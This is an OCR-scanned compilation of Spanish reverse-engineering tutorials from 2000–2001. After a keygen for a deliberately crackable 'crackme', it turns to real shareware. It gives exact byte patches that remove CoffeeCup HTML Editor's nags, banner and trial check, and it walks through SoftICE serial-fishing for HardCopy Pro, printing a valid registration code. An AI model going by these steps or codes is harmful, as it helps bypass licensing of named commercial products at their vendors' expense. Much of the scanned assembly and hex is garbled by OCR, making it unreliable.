e xasx de tnt! http://www.tntcrackers. ws 


e Viper ( creador de file inspector ) file inspector web site http://www. finspec.swsites. net/ index. htm 


e toda la people de tutoriales2000. 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 
programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Tutorial sobre Delphy CrackMe 2.d 


Protección: Anti-Win32Dasm, Anti-FrogSice, posible Encriptacion y Serial 
Descripción: Programa cuya unica finalidad es ser crackeado 
Dificultad: Aficionado 


Download: http://www, 2Sweeet.tsx.org 


Herramientas: Sofl ce, papel y boli € Tasm v5.0 


Cracker: Mr.Burns 01/01/2001 


introducción 


hola de nuevo a todos!!! espero que mi demora en el mundillo de los tutoriales no haya sido tan grande. ante la 
falta de tiempo, mis proyectos underground se ven retrasados, pero gracias a este puente, os podre “deleitar” con 
otro tutorial mas. 


antes de nada explicar que el crackme ha sido creado por 2sweeet, no lo conozco pero he visto trabajos suyos y, la 
verdad, me han parecido bastante majos. 


despues de tanto sentimentalismo creo que deberiamos empezar con el trabajo, el cual me ha gustado hacer ;-) 


comenzamos ejecutando el crackme. observamos que tenemos 3 editbox para introducir nuestros datos, y tres botones: 


“register”, “close” y“about”. bueno, introducimos nuestros datos y apretamos “register”, veremos que abajo de la win nos 
pone “status: wrong code”, vaya!!! parece que no he acertado en el serial xddddd 


una vez estudiado como funciona el crackme haremos lo siguiente: 


12. ejecutamos el win32dasm y lo desensamblamos... pero... en la direccion 41fcbc éste se nos cuelga. esto quiere decir que 
hay dos posibilidades: esta empakado y/o encriptado o tiene anti-desensamblador. yo voto por el anti-desensamblador 
porque el tamaño del crackme no es muy pequeño que digamos. 


22. como no nos ha rulado, seguiremos probando con el ida pro a ver si sus protecciones anti-desensamblador se las puede 
saltar... pero tampoco nos rula. este nos indica que no puede abrirse. :( 


32. ejecutaremos el procdump para ver si esta encriptado el dichoso programiilla de los ..... ;-) pero... tampoco funciona, al 
abrir el crackme a traves de el “pe editor” no avisa con una frase como esta “error while accesing the file (read/write)”. 


42. nos aferraremos a la unica posibilidad que tenemos: el softice (sice). abrimos el crackme y rellenamos nuestros datos: 
username: mr_burns 
company: k-for 
key-string: 12345678 


al rellenar el serial nos daremos cuenta que tan solo nos deja introducir 8 caracteres. hmmmml!!! esto me esta dando una 
pistas preciosas... el serial puede que este en hexadecimal!!! 


despues de esta deduccion, nos metemos en el sice (control + d) y metemos un bpx hmemcpy, y salimos de nuevo al 
crackme para apretar el boton “register”. inmediatamente saltamos al sice, de nuevo. quemamos la tecla f12 hata llegar a la 
direccion 442291 donde observamos que eax = username. 


auna vez aqui seguiremos dos caminos: uno sacar un serial valido; y una vez conseguido esto buscar la rutina de generacion 
del serial. 


— obtencion del serial - 


a medida que traceamos vemos algo como esto: 
mov eax,[ebp-04] <--- eax = nombre 
call 403bf8 <--- comprueba que haya algo escrito, osea difrente de O 
call 407904 <--- capta el n2 de letras que posee el nombre 

mov ecx,eax <--- ecx = n£ de letras 
mov edi, 1 
mov eax, 1 

cmp eax,ecx <--- comprueba que el nombre sea mayor que 1 sino... error 


ja 4422bd 


despues de haber comprobado que el nombre es correcto y haber sido guardado, realiza exactamente la misma operación 
con la compañía. tracenado mas sobre el codigo vemos que realiza una serie de opreciones... hasta llegar a un salto 
sospechoso en 442293 donde aparece: 


mov edx,[ebp-18] <--- nuestro serial (12345678) 


call 403b44 <--- compara los serial 
jz 4425ac <--- salta si son iguales 
espero no tener que deciros que para ver el serial verdadero teneis que poner “d eax” ;-) 


como podreis ver, llegar a descubrir el serial es extremadamente facil. una vez apuntado nuestro serial salimos del sice y lo 
comprobamos para ver si ese es el verdadero, no hace falta que os diga que si que lo es xdddd 


ahora iremos a por el keygen!!! 


— realizacion del keygen E 


una vez obtenido el serial correcto, nos dedicaemos a un estudio mas en profundidad sobre el codigo, para captar el 
generador de llaves. asi que volvemos a ejecutar el crackme, introducimos los datos, entramos en el sice, ponemos le bpx 
hmemcpy, salios del sice, apretamos “registrar”, y vamos de nuevo a la direccion 442291. alli podremos observar lo siguiente: 


mov eax,[ebp-04] <--- eax = nombre 
call 403bf8 <--- comprueba que haya algo escrito oase difrente de O 
call 407904 <--- capta el n2 de letras que posee el nombre 
mov ecx,eax <--- ecx = n£ de letras 
mov edi, 1 
mov eax, 1 
cmp eax,ecx <--- comprueba que el nombre sea mayor que 1 sino... error 
ja 4422bd 
mov edx,[ebp-04] <-- edx apunta a la nombre 
movzx edx, byte ptr [eax+edx-01] <-- edx = carácter de la nombre 
inc eax <-- eax + 1 
add edi,edx <-- edi + edx 
cmp eax,ecx <-- compara eax con ecx 


jbe 4422ae <-- si eax > ecx realiza de nuevo la operacion 


lea edx,[ebp-Oc] 
mov eax,[ebx+2cC8] 
Call 423224 


una vez terminado el bucle que trabaja con el username (en mi caso mr_burns) tenemos guardado un numero en edi que 
usara mas adelante, para poder verlo introducimos “? edi” (en mi caso sera 809). despues de haber trabajado con el 
username, va a por el company: 


mov eax,[ebp-0Oc] <-- eax apunta a la compañia 

call 403bf8 <-- comprueba que halla escrito algo 

Call 407904 <-- n2 de caracteres de la compañia 

mov [ebp-08],eax <-- [ebp-08] = n* de caracteres de la compañia 

mov esi, 1 
mov eax, 1 

cmp eax,[ebp-08] <-- compara eax con [ebp-08] 

ja 4422fa <-- si eax > [ebp-08] error! 
mov edx,[ebp-Oc] <-- edx apunta a la compañia 
movzx edx, byte ptr [eax+edx-01] <-- edx = carácter de la compañia 
inc eax <-- eax + 1 
add esi,edx <-- esi + edx 
cmp eax,[ebp-08] <-- compara eax com [ebp-08] 
jbe 4422ea <-- si eax > [ebp-08] realiza de nuevo la operacion 


espero que os hallais dado cuenta que realiza exactamente la misma operación con la compañía (en mi caso k-for) y que el 
resultado de esa serie de operaciones esta guardado en esi, para poder verlo poneis “? esi” (en mi caso sera 384) 


despues de esto hay una serie de operaciones a las que no debemos hacer caso, asi que tracearemos hasta llegar a la 
direccion 442351, donde veremos: 


lea eax,[edi+esi] <-- eax = edi + esi 
imul eax,eax, 12h <-- 
mov [ebp-10],eax <-- [ebp-10] = eax 
mov eax,[ebp-10] <-- viceversa 
imul dword ptr [ebp-10] <-- eax * [ebp-10] 
imul edi <-- multiplicacion por edi 


mov [ebp-10],eax <-- [ebp-10] = eax 


sub [ebp-10],esi <-- [ebp-10] - esi = serial correcto!!! 


al final de esta serie de operaciones tenemos en [ebp-10] un numero un tanto atractivo... ¿y sabeis porque? pq el numero es 


mayoria de las veces se trabaja en decimal para luego pasarlo a otra base. asi que ya estaba todo solucionado... ahora habia 
que hacer el keygen en asm. 


con todos los comentarios que he puesto en el tutorial no creo que os resulte dificil hacel el keygen en cualquier otro 
lenguaje, y para los que sabemos programar en asm esto no es nada ya que tan solo hay que copiar. como el tamaño de 
este tutorial ha sobrepasado mis intenciones os pondre tan solo el codigo comentado (como hago siempre) y nada mas, aun 
asi si teneis cualquier tipo de duda, mandadme un mail. 


¿delphi crackme 2.d keygen 
¿coded by mr burns [k-for] 


;date: 4-12-2000 


«model tiny 
.code 
.386 


org 100h 


start: jmp letsrock 


intro db 10,13,'delphi crackme 2.d keygen coded by mr. burns [k-for]' 
db 10,13,'the crackme is written by 2sweeet' 
db 10,13,'websites: http://go.to/mr_burns/' 
db 10,13,' http: //kfor.cjb.net/',10,13 
db 10,13,'enter your username: ' 
nombre db 50,0 
nombre2 db 50 dup(0) 

companyout db 10,13,'enter your company: $' 

company db 25,0 


company2 db 25 dup(0) 


serialout db 10,13,'your key-string is: ' 
serial db 9 dup(0) 
serialend db 10,13,'$' 
tempserial db 9 dup(0) 


tempserialend db O 


letsrock: 
mov ah,09h ;introduce un texto por pantalla 
lea dx, intro 


int 21h 


mov ah,0ah ;lee el nombre introducido 
lea dx,nombre 


int 21h 


mov edi, 1 ¡edi 


Il 
p 


mov eax,1 ;eax 


nameloop: 
lea edx,nombre2 ;edx apunta al nombre 
movzx edx,byte ptr [eax+edx-1] ;edx caractrer del nombre 
inc eax ;eax + 1 
add edi,edx ;edi + edx (resultado en edi) 
cmp eax,ecx ;compara eax con ecx 


jbe nameloop ¡si eax < ecx salta 


mov ah,09h ;saca un texto por pantalla 
lea dx, companyout 


int 21h 


mov ah,0ah ;lee la compañia 
lea dx, company 


int 21h 


mov esi,1 ¡esi = 1 


mov eax,1 ;eax = 1 


companyloop: 
lea edx,company2 ;edx apunta a la compañia 
movzx edx,byte ptr [eax+edx-1] ;edx = caracter de la compañia 
inc eax ;eax + 1 
add esi,edx ;esi + edx (resultado en esi) 
cmp eax,ecx ; compara eax con ecx 


jbe companyloop ;si eax < ecx salta 


mov ecx,edi ;ecx = edi 
add edi, esi ;edi + esi 
mov eax,edi ;eax = edi 


imul eax,eax,1f2h ; 


mov ebx,eax ;ebx = eax 


mov eax,ebx ;eax = ebx 


imul ebx ;* ebx 


mov edi,ecx ¡edi = ecx 
imul edi ;* edi 
mov ebx,eax ;ebx = eax 
sub ebx, esi ;ebx - esi = serial en decimal 


mov eax,ebx ;eax = ebx = serial 


hex_convert: ;rutina que convierte el numero decimal 
lea esi,tempserialend-1 ;a hexadecimal y que no voy a comentar. 


mov edx,4 


loopy: 
xor ebx,ebx 
mov bl,al 
movzx ebx, bl 
and bl,Ofh 
add bl, 30h 
cmp bl,39h 
jle ok1 
add bl, 7 
mov byte ptr [esil,bl 
dec esi 


jmp part2 


okl: 
mov byte ptr [esil,bl 


dec esi 


part2: 


mov bl,al 


movzx ebx, bl 


shr bl, 4 


add bl,30h 


cmp bl,39h 


jle ok2 


add bl, 7 


mov byte ptr [esil,bl 


dec esi 


jmp part3 


ok2: 


mov byte ptr [esil,bl 


dec esi 


part3: 


shr eax,8 


dec edx 


jnz loopy 


convertdone: 


inc esi 


lea di,serial 


copynumber: 
movsb 
cmp byte ptr [esi],0 


jne copynumber 


mov ah,09h 
lea dx, serialout 
int 21h 
mov ah,4ch 


int 21h 


: end start 


— agradecimientos y despedidas - 


antes de marcharme me guataria saludar a todos los miembros del grupo k-for, en especia a viper y a prexfesor x... y me 
gustaria saludar tambien a todos los componentes del canal Hcrackers. 


espero volver a veros pronto por aquí, aunque todo depende del tiempo que tenga. 


como siempre digo en mis tutoriales, si deseais hablar conmigo buscad en: 


nick servidor Canal 
mr_burns irc.irc-hispano.org crackers 
[mordred] irc.chat.org tntcrackers é: wkt 


O por el contrario si tan solo deseas mandarme un e-mail: mr_burns_kfortdhotmail.com 


http://go.to/mr_burns/http://mr_burns. go.to/http: //mrburns.da.ru/ 


http://pagina.de/kforhttp://kfor.cjb.net 


| “la ignorancia no es una es una excusa, es una opción.” 
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Programa: CoffeeCup Html Editor v8.7 


PROTECCION: Trial de 30 días. 

Descripcion: Pe 
Dificultad: Principiante 

DOWNLOAD : MO E 
Herramientas: | Softice, Wdasm, Editor Hexa, DeDe, ExeScope 


CRACKER: KuaTo_ThoR FECHA: 10/12/2000 


introduccion 


otra vez aquí amigos. esta vez con un editor htm, el coffeecup. el programa está bastante bien, y la protección, 
bueno... eso ya lo veréis vosotros mismos, nos divertiremos un rato. 


el wdasm y el dede los utilizaremos para localizar pistas, o puntos calientes que nos faciliten el trabajo, pero no son 
imprescindibles, aunque sí aconsejables. 


el exescope ya veréis para que es. :-) 


al atake 


preliminares. obtener información 


lo primero como siempre es saber de que va el tema. ejecutamos el programa, y nos recibe una bonita nag. tiene unos 
botones, pero ninguna opción de registrarnos sin conectarnos a internet. lo que podemos observar es que esta nag es una 
imagen, no es un cuadro de diálogo ni nada parecido. interesante. continuemos viendo más cosas. pulsamos start, y nos 
aparece el programa, con un banner amarillo que nos recuerda que debemos soltar los cuartos para olvidarnos de él. si 
miramos en acerca de..., podremos ver que no hay opción de registro, y también nos podemos dar cuenta de que la frase 
que está en el banner amarillo, cambia cuándo salimos de algún menú. grave error. como ya estamos artos del programa 
salimos, para analizar el archivo, pero ¡¡¡sorpresa!!! al salir nos espera otra bonita nag. esto ya empieza a cansar. también 
hay un boton para registramos y en el menú help también. el botón y el menú, se pueden quitar sin ningún problema así: 
tools->tools bar and menu->customize->nos aparece una ventanita, ahora sólo tenemos que pinchar sobre el botón y la 
referencia del menú y arrastrarlos a la ventana. fuera botones. 


pués bien, analizemos el archivo, por ejemplo con el file inspector, lo hacemos y nos dice que está compilado con delphi 4, y 
que no está comprimido ni encriptado ni nada de nada. 


recordáis lo que os dije de que la nag es una imagen, pués abramos el archivo con exescope, a ver que podemos ver. 
abrimos el archivo, vamos a resource, y seleccionamos gif. si miramos splash_s, veremos que esla nag inicial, pero ¿qué hay 


final, y en background el fondo del programa, qué si no nos gusta podemos cambiarlo. luego hay unas imagenes de mp3.com 
que no sé que será. 


bien, ya estamos preparados. 


la nag inicial 


abrimos el ejecutable (coffee.exe) con el dede. vamos a procedures y miramos a ver que vemos. por defecto miraremos 
los lugares donde aparece la palabra splash: backsplashform, splashsharewareform y frmsplash. ésta última, si 
miramos en formcreate, veremos que muestra la ventana de registrado (splash_r). 


en splashsharewareform, se forma la nag inicial, si miramos los eventos, los que empiezan con btn son botones, al 
pulasr sobre cada botón, se ejecutará el código que viene aquí. si miramos en btnstartclick, veremos que aquí se 
esconde el código que nos manda a la mierda una vez que ha expirado el programa, aunque no viene al caso. bien, 
miramos en formcreate, y apuntamos la dirección en donde acaba: 6222e9. vamos con softice. abrimos con el symbol 
loader, y ponemos bpx 6222e9 damos f5 y ... volvemos a sice (ya podemos quitar este breakpoint) ¿notáis algo raro? 
mmm... aún no ha aparecido la ventana, así que continuamos traceando con f10 hasta que salga, que será pronto, justo 
cuando llegamos a 622f94: 


00622194 ££92cc000000 call dword ptr [edx+00cc] <- aquí sale la nag 
00622f9a 83f802 cmp eax, 02 

00622f9d 7540 ¡nz 00622fdf 

00622f9f c605d632630001 mov byte ptr [6332d6], 01 

00622fa6 eb37 ¡mp 00622fdf 

00622fa8 8b0df0e16200 mov ecx, [62e1f0] 


al pulsar sobre este call, aparece la nag, pulsamos start, y volvemos al sice, podemos ver en los registros(f2) que eax = 
1. supongo que estaréis pensando lo mismo que yo ;-) ponemos un breakpoint aquí (622f94) y volvemos a iniciar el 
programa. salta sice en el call, vamos a sustituirlo por un mov eax, 01, que en bytes es b801000000, pero hay que 
darse cuenta que en esta ocasión el call son seis bytes y el mov son cinco, luego hay que meter un nop (90). en este 
ocasión vamos a editar directamente los bytes en sice, metemos en la linea de comandos e eip (en vez del usual a eip) y 
vemos que el cursor se situa en la pantalla de datos, justo en ff 92 cc 00 00 00, pués bien, los sustituimos por b8 01 00 
00 00 90 y pulsamos enter, ya hemos cambiado la instrucción, pulsamos f5 y arranca el programa, pero sin la nag!!! 
nag inicial fuera. 


nag final 


bien, esta nag es exactamente igual a la anterior, asi que os la dejo a vosotros como debres ;-) 
el banner 
esto es lo más interesante, el banner. 


bueno, lo primero es tener claro qué es lo que queremos hacer con el banner. hay varias opciones: 


ii. a la mierda con el banner. 
escoge la que más te guste, hay otras posibles opciones, pero mi tiempo es finito ;-) 


nos quedamos con el banner 


para esto vamos a utilizar wdasm. lo abrimos, y buscamos una de las frases que aparecen, por ejemplo la frase inicial: "this 
yellow banner will desapear when you buy now!" . aparecemos en esta zona, pongo lo más interesante: 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:005daa12(c) 


| 

:005daalb a1682f6300 mov eax, dword ptr [00632f68] <- asignamos un valor a eax. 

:005daa20 83f819 cmp eax, 00000019 

:005daa23 0f874e010000 ja OO5dab77 

:005daa29 ff248530aa5000 ¡mp dword ptr [4*eax+005daa30] <- saltamos a la dirección resultante de la operación 


:005daa98 8bc3 mov eax, ebx 


* possible stringdata ref from code obj ->"this yellow banner will disappear " 
->"when you buy now !" 


| 

:005daa9%a ba88ab5d00 mov edx, OO5dab88 
:005daa9f ese493e2ff call 0O403e88 
:005daaa4 e9ce000000 ¡mp OO5dab77 


bien, en la primera parte es donde selecciona la frase que nos va a sacar, dependiendo del valor de eax, lo multiplica por 4 y 
le suma 5daa30. pero si nos fijamos, en la primera línea, aquí es donde da el valor a eax, por tanto, si fijamos ahí el valor, 
podremos conseguir que la frase que aparezca sea siempre la misma, y por tanto sólo tenemos que buscar en el editor hexa 
dicha frase y cambiarla por lo que queramos. 


con softice, poniendo un breakpoint en 5daalb, podemos ver que cuando aparece la frase inicial, a eax se le asigna el valor 
O, luego sólo hay que sustituir 'mov eax, dword ptr [00632f68]' por 'mov eax, 0'. nuestra frase ya está fija. 


pero si pulsamos sobre ella aún nos enviará a la dirección de coffeecup, así que esto lo tenemos que cambiar. tambien con el 
editor hexa, por supuesto. pero si la intentamos buscar a lo bestia, es decir, con el buscador del editor, veremos que aparece 
en muchas ocasiones, así que habrá que buscarla de manera más certera. (esta parte no es imprescindible ya que podemos 
hacerlo simplemente con el editor hexa) 


vamos a utilizar una bonita utilidad, creo que se llama winspector, lo ejecutamos y nos aparece algo cómo esto al poner el 
cursor sobre el banner: 


Todos a la página de K-F 


cómo podemos ver este programa sirve también para obtener el handle de las ventanas. pero lo que nos interesa a nosotros 
es donde pone "windowtext: pnlannoy" y "parent window class name: tfrmmain". bien, ahora vamos al dede, y en 
procedures, seleccionamos frmmain, nos aparecen un montón de eventos, así que para no volvernos locos los colocamos 
por orden alfabético pulsando un par de veces sobre event y buscamos donde aparezca la palabra annoy (menudo cabrón) 
que es en Ilbnannoyclick. pulsamos un par de veces sobre el evento y nos aparece el código, entre lo que podemos ver: 


006lbe7a 33c9 xor ecx, ecx 
* possible string reference to: "http: //www.coffeecup.com" 


| 
0061be7c b890be6100 mov eax, $0061be90 


bien, aquí está nuestra dirección, OO61be90, cuyo offset debemos saber obtener, quién no sepa que mire en algún tute 
anterior mio o que me lo pregunte. bueno, el offset es 21b290. vamos allí con el editor hexa y metemos la web que más nos 
guste, yo cómo os habréis imaginado al ver la frase he puesto http://pagina. de/kfor. 


a la mierda con el banner 


bien, lo de antes nos sirve, aunque cuando llegamos a esas alturas, el banner ya está formado, ahí únicamente selecciona la 
frase que va a poner. así que nuestro problema es cómo encontrar el lugar donde crea el banner. podemos ir traceando 
desde que nos cargamos la primera nag, a la espera de que nos salte la ventana principal, ya ques cuándo esta aparece, lo 
hace ya con el hueco para el banner. pero eso es muy trabajoso, y no nos garantiza que podamos tener exito. 


vamos allá. cómo podemos ver en el código venimos de un salto condicional en 5daal2. lo primero que pensamos es invertir 
el salto y a ver que pasa, si habéis hecho el paso anterior no pasará nada, si no aparecerá una frase especial sólo para 
nosotros los crackers (esto es una suposición ;-) ), sin enlace a la página, preguntándonos si nos molesta el banner, jeje. 
bien, vayamos más atrás, a este salto hemos llegado desde un call, concretamente este: 5da9al, que si lo buscamos nos 
aparece esto: 


* referenced by a call at addresses: 
|:0060b2b5 , :006153b3 , :0061990f 


| 
:005da97c 55 push ebp 


:005da998 8b9890030000 mov ebx, dword ptr [eax+-00000390] 
:005da99e 8d45fc lea eax, dword ptr [ebp-04] 
:005da9%al e862000000 call 0O5daa08 <- este el es call 


hay tres llamadas distintas, el código donde aparecen es este: 


:00619996 es450ffcff call OO5da8e0 <-esta llamada puede ser interesante 
:0061999b 84cO0 test al, al 

:0061999d 7405 je 00619924 

:0061999f esdeoffcff call OO5da97c <- nuestra llamada 


este: 


:006153aa e83155fcff call 0O5da8e0 <- esta llamada es interesante 
:006153af 84C0 test al, al 

:006153b1 7405 je 006153b8 

:006153b3 e8c455fcff call O0O5da97c <- nuestra llamada 


y este: 


:0060b2Zac e82ff6fcff call OO5da8e0 <- esta es la llamada 
:0060b2b1 84c0 test al, al 

:0060b2b3 7405 je 0O060b2ba 

:0060b2b5 e8c2f6fcff call O0O5da97c <- nuestra llamada 


!!!! son fotocopias ¡¡¡¡ esto es un cante, las tres llamadas precedidas de un call (el mismo en las tres !!!), con lo que saca de 
él hace una comparación , y un salto condicional después, sólo falta que nos ponga "aquí, es aquí !!!" bueno, aceptaremos su 
invitación, y nos metemos en ese call, en 5da8e0. y vemos más o menos esto: 


* referenced by a call at addresses: 
|:0060b2ac , :0060dcd9 , :00614bb1 , :006153aa , :00618eba 
|:00619996 , :0061c21a , :00622f66 


| 
:005da8e0 55 push ebp 


:005da8f6 ese5fcffff call OO5da5e0 

:005da8fb 803d842f630000 cmp byte ptr [00632f84], 00 
:005da902 7404 je 0O5da908 

:005da904 33db xor ebx, ebx 

:005da906 eb02 ¡mp 005da90a 


qué os parece, hay otras cuatro llamadas más a esta dirección, interesante. vamos a poner un breakpoint en el comienzo de 
la llamada, en 5da8e0, para ver cuándo y para que se hace la llamada. damos softice y observamos las veces que nos salta 
y cuándo lo hace. vaya, antes de aparecer la ventana, lo hace tres veces. una de esas es la que nos interesa a nosotros, 
concretamente la tercera. volvemos a ejecutar el programa, y en la tercera vez que nos salta, pulsamos f11 para ver que call 
nos llamó, y aparecemos en 614bb1, aquí: 


:00614bb1 e82a5dfcff call OO5da8e0 
:00614bb6 84c0 test al, al 
:00614bb8 7454 je 00614c0e <- este es nuestro salto 


una comparación y un salto después, esto creo que me suena ;-) 


si traceamos un poco hasta el salto, podemos ver que no salta, así que lo invertimos y damos a f5... ¿dónde se metio el 
banner? ya no es tan "annoying", jeje. por tanto podemos hacer entre otras cosas estas dos: cambiar el salto condicional por 


un salto incondicional, es decir un jmp, o en lugar de la llamada poner un 'mov eax, 0' y ya está. esta elección os la dejo a 
vosotros. 


método rápido 
aquí vamos a empezar con el archivo coffee.exe original. 


con lo último que he contado antes, parece que está claro, voy a volver a poner el código de esa llamada tan interesante que 
vimos: 


* referenced by a call at addresses: 
|:0060b2ac , :0060dcd9 , :00614bb1 , :006153aa , :00618eba 
|:00619996 , :0061c21la , :00622f66 


| 
:005da8e0 55 push ebp 


:005da8f6 eses5fcffff call OOS5Sda5e0 

:005da8fb 803d842f630000 cmp byte ptr [00632f84], 00 
:005da902 7404 je OO5da908 <- aquí hay que parchear. 
:005da904 33db xor ebx, ebx 

:005da906 eb02 ¡mp O05da90a 


vaya, hay un salto condicional !!! ponemos un breakpoint ahí y vemos que pasa. si lo hacemos, veremos que realiza el salto, 
por tanto, lo nopeamos (a eip->nop y otro nop) (también: e eip-> 9090) (el eip sólo si estais sobre la intrucción, mirar el 
registro eip y sabréis porqué). pués lo dicho lo nopeamos y pulsamos f5, !!! nos aparece la nag de registrados !!! damos ok y 
nos vuelve a saltar y así sucesivamente. por tanto lo único que tenemos que hacer es ir a nuestro editor hexa y nopear el 
salto, o si no os gusta poner nops, podéis poner por ejemplo 'xor ebx, ebx' que es la siguiente instrucción. hacemos el cambio 
en el editor hexa, y ejecutamos ... todo perfecto. fin. 


conclusiones 
bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo. espero que os haya resultado útil este tute. no olvidéis que nuestro objetivo sólo es 


aprender. sin contar con la diversión que esto supone por supuesto ;-)) 


un gran saludo para todos los miembros de [k-for] (viper, raziel, leirus, txeli, profesor x, dek_oin, afa, crkviz, mr_burns, 
alambike y jkeeper) y para los amigos de tutoriales 2000 (aquí no me caben). y por supuesto para todos vosotros. 


cómo este es mi último tuto del siglo (ahora comienza el siglo, se empieza a contar por el uno no por el cero), aquí va 
un pequeño homenaje a una de las mentes más brillantes de este siglo: 


" sólo conozco dos cosas infinitas en este mundo: el universo y la estupidez humana, y de la primera no estoy muy 
seguro" 

albert einstein. 

hasta la próxima... 


«or zea y» 


mi correo: kuato_thortodhotmail. com 


la página de [k-for]: http: //pagina.de/kfor 
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Karpoff Spanish Tutor 2001 


HardCopy Pro vl1.62 


introduccion 


hola amigos, presento mi décimo sexto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoGhotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
en este tutorial usaremos el softice. si no lo tienes instalado puedes bajártelo en www.crackstore.com . asumo 
que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro debo decir : este texto ha 
sido escrito sólo con propósitos educacionales. 


comentario del programa 


hardcopy pro es una utilidad que sirve para capturar pantallas para windows 95/ 98/ nt 4.0 y 2000. puede capturar 
áreas de la pantalla rectangulares y las ventanas enteras. 


lo que nos importa... el programa es shareware con libre uso de 30 días por lo que si quieres seguir utilizándolo 
deberás registrarte y para eso pagar unos cuantos dólares. :( 


contamos con softice... :) 


manos a la obra 
antes de abrir el programa lo analizamos con file inspector v3.5 el que nos mostrará información realmente importante a la 
hora de atacar el programa; bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en microsoft visual c ++5.0 
e no está empacado 


a continuación... cerramos file inspector v3.5 y abrimos hardcopy pro 


luego abrimos el programa para ver como luce, y al verlo nos encontramos con una lengúeta que dice! demo, entonces 
vamos ahí y nos encontramos con un botón que dice register now, lo presionamos y al fin estamos en la caja de registro la 
que nos pide los siguientes datos: 


your name: 
your registration code: 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a OK y por supuesto que el programa no 
aceptará el código de registro y nos mostrará un mensaje como este... 


registration failed! 


the registration number you have entered ¡is not valid for your name! check if you have entered all information correctly 
(case sensitive) or visit our website for information about how to get your personal registration code. 


a continuación... cerramos hardcopy pro 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos hardcopy pro y vamos directamente a la caja de registro en donde introducimos nuestro nombre, 
y cualquier código de registro. todavía no damos click en OK ; lo que ahora debemos hacer es presionar control-+d para que 
salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a OK y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 ----- > f12 29 veces para caer aquí... 

015f: 00404003 83f802 cmp eax, 02 

seguimos con f10 hasta una líneas más abajo... 

015f: 00402006 742c jz 00402034 

015f: 00404008 6a00 push 00 

015f: 0040a00a e8s41ffffff call 00409f50 

015f: 0040a00f 833d6c53410001 cmp dword ptr [0041536c] , 01 ----> aquí está lo importante 


ahora nos paramos aquí para comenzar a preguntar y colocamos... 


? edx y vemos esto: 
3433326c 0875770476 '4321' ---> los cuatro primeros números de mi registro falso,invertidos (yo había puesto 12345678) 
entoces colocamos... 


? ecx y vemos esto: 


ahora debemos buscar para encontrar el registro real y para eso colocamos... 
SOL FEE tr] sl 
presionamos enter y en la window data tendremos el registro real ante nuestros ojos... 
rjsl74nwsv 
ya lo hemos hecho, en mi caso la caja de registro quedaría así... 
your name: act mago 
your registration code: rjsi74nwsv 
damos click en OK y... 
thank you for registering hardcopy pro! 


you now have a personalized full version of the program without the limitations of the demo. 


programa crackeado... 
nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoUhotmail. com 


saludos 


saludos a profesor x. 
saludos a dek_oin. 
saludos a crkviz. 


saludos a code_ mex. 


saludos a tnt!crack!team ( saludos a xasx, no pararé : ) ) http://www.tntcrackers.ws 


saludos a karpoff ( excelente página loco!!) http://welcome.to/ karpoff 


saludos y agradecimientos a viper del grupo [k-for] , por el genial file inspector. 


saludos a toda la people de tutoriales2000. 
saludos al Idea ( monofeo (gran amigo), flaco, chirda, taza, afo, solerman, nasal, piter y 
saludos a todos los crackers del mundo. 


chaoj¡¡¡i 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 
recuerden, lean muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


13/12/00 act mago__ 16 
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Karpoff Spanish Tutor 2001 


Programa . MP3Shortcuts v1.0 
PROTECCION: Name / Serial. 
Objetivo: Conseguir un código de registro válido. 
Descripcion: Crea enlaces a tus MP3 favoritos. 
Dificultad: Newbie. 
DOWNLOAD : http: //www.heathcosoft.com 
Herramientas: File insPEctor v3.5 y Softlce v4.05 
CRACKER: Act Mago FECHA: 17/12/2000 
INTRODUCCION 


hola amigos, presento mi décimo quinto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoGhotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
en este tutorial usaremos el softice. si no lo tienes instalado puedes bajártelo en www.crackstore.com . asumo 
que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro debo decir : este texto ha 
sido escrito sólo con propósitos educacionales. 


al atake 


comentario del programa 


crea enlaces a tus mp3 favoritos. 


es una sencilla utilidad para crear una especie de acceso más rápido a tus mp3 y listas de estos. se integra con winamp a la 
perfección y apenas ocupa lugar en tu sistema, instalándose en la barra de tareas de tu pc. no hemos encontrado este 
programa como esencial, pero tienes 30 días para probarlo por ti mismo y juzgar, puede que se adapte a tus necesidades. 


comentario extraído desde www.softonic.com debido a que no he tenido tiempo para probar el programa. 


el programa es shareware con libre prueba de 30 días. ..obviamente si quieres seguir usándolo después de ese período 
deberás pagar la suma de $15us : ( 


contamos con softice... :) 


manos a la obra 


antes de abrir el programa lo analizamos con file inspector v3.5 el que nos mostrará información realmente importante a la 
hora de atacar el programa, bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en microsoft visual c ++5.0 
e no está empacado 


a continuación... cerramos file inspector v3.5 y abrimos mp3shortcuts v1.0 


luego abrimos el programa para ver como luce, pero este queda instalado en la barra de tareas, entonces vamos al menú 
que este tiene y le damos click a enter registration code y estaremos en la caja de registro, la que nos pide los siguientes 
datos: 


registration name: 
registration code: 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a register y por supuesto que el programa no 
aceptará el código de registro y nos mostrará un mensaje como este... 


the registration name and registration code pair you entered is incorrect. 


